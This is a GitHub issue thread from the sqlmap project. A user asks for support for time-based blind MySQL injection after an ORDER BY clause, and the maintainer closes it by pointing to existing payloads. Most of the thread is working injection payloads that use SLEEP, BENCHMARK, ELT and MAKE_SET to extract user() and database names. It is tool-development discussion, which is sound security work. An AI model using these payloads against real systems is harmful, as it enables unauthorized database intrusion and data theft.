### ISSUE TITLE
add time based sql injection payload

### ISSUE THREAD

**Issue by crossedz** [sqlmapproject/sqlmap#1259]
sqlmap needs to add this injection payload syntax: `vulnerableparameter=2,if(substring(user(),1,1)='a',SLEEP(1),1)`

I went through all the logs of used payloads by sqlmap when using `--level=5 --risk=3 -v 3` and not once did I see that being used, that is the only syntax that works against the target I'm using.

Everything else that sqlmap tries, simply fails.

**Comment by crossedz** [comment]
On a further note, this particular injection is after the ORDER BY clause, hence why the injection begins with `,` and follows on with `if(substring(user(),1,1)='a',SLEEP(1),1)`.

**Comment by crossedz** [comment]
On further inspection when viewing rather old logs from sqlmap on another target where the traditional:
`and sleep(10)#` injection worked, I see SQLMAP uses:
`IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64),SLEEP(1),9446`

Which works absolutely perfectly on the target, but for some reason it just cannot handle the fact that the injection begins with a comma and that no comments such as `#` `--` are allowed at the end?

This makes no sense.

It seems the technique that's required to exploit this sql injection actually exists in sqlmap but it is excluded from the testing phase of whether the injection exists in the first place or not, so that is what is broken and that is what needs to be fixed with sqlmap, it needs to use this method of testing also, not just

**Comment by crossedz** [comment]
The direct payload that it uses is:
`[16:18:11] [PAYLOAD] 12376644' AND 9446=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64),SLEEP(5),9446)#`

first part where it begins with ' should be no problem, using `--prefix=","` theoretically should fix that, same goes for the `#` at the end, `--suffix=""` should fix that to make sure no comments are placed at the end of the query.

With those modifications in mind, the payload is now converted to:
`12376644,AND 9446=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64),SLEEP(5),9446)`

However, a problem still exists, due to the unnecessary `AND 9446=` which breaks the injection in the target I'm talking about.
If the payload is modified to remove `AND 9446=` which will lead to the payload being:
`12376644,IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64),SLEEP(5),9446)`

That right there is the goldmine and will fix the problem.

**Comment by crossedz** [comment]
Here's another example that sqlmap uses:
`, AND (SELECT%20* FROM (SELECT(SLEEP(5)))wTbL)`

that 'AND' part just breaks the injection, 
`,(SELECT%20* FROM (SELECT(SLEEP(5)))wTbL)` works perfectly fine, how can i make sqlmap just remove those useless `AND` parts that break the query?

**Comment by stamparm** [comment]
`vulnerableparameter=2,if(substring(user(),1,1)='a',SLEEP(1),1)`
this is already covered with `parameter replace` payloads. Those can be seen inside the traffic as (e.g.):

`vulnerableparameter=(SELECT (CASE WHEN (3075=3075) THEN SLEEP(5) ELSE 3075*(SELECT 3075 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))`
`vulnerableparameter=(SELECT * FROM (SELECT(SLEEP(5)))eCao)`
`vulnerableparameter=(SELECT (CASE WHEN (3884=3884) THEN (SELECT BENCHMARK(5000000,MD5(0x4a707871))) ELSE 3884*(SELECT 3884 FROM mysql.db) END))`
`vulnerableparameter=ELT(9773=9773,SLEEP(5))`
`vulnerableparameter=MAKE_SET(4213=4213,SLEEP(5))`

Closing this one down because sqlmap already uses effective technique in case of `ORDER BY` cases
